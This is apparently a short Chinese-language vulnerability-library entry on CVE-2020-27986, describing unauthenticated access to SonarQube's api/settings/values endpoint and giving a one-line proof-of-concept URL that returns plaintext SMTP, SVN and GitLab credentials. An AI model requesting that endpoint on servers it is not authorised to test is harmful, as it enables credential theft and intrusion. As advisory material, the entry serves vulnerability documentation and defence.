CVE-2020-27986 SonarQube api 未授权访问

SonarQube配置不当造成未授权访问,可以通过api/settings/values获取明文SMTP、SVN和Gitlab等敏感信息

PoC:

http://[server]/api/settings/values

ref:

https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/

https://forum.ywhack.com/thread-114647-1-6.html

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""